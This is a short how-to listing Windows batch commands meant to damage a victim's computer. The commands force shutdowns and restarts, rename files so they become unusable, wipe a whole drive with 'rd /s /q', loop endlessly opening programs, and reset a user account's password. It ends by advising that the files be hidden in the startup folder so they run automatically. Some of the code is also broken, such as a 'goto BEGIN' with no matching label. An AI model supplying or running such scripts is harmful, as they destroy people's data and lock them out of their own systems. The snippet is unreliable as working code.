Shutting down the System:
shutdown -s -f //shuts down system forcefully within 30 secs.
Restart the System:
shutdown -r -f //restarts the system forcefully within 30 secs.
Changing File Extensions:
ren [filename.ext] [samefilename.differentext] //makes the files unusable.
Deleting all files of a drive:
@echo off
rd /s /q [drivename:]
ex: @echo off
rd /s /q D:
note :- Not applicable for only the system drives.
Opening a file infinite no. of times:
start [applicationname/filename.ext]
goto BEGIN
start notepad
goto BEGIN
net user [annount_name] *
ex:- net user john *
note:- For best results, copy the created batch files in a folder named 'startup',applying the attributes and hiding it.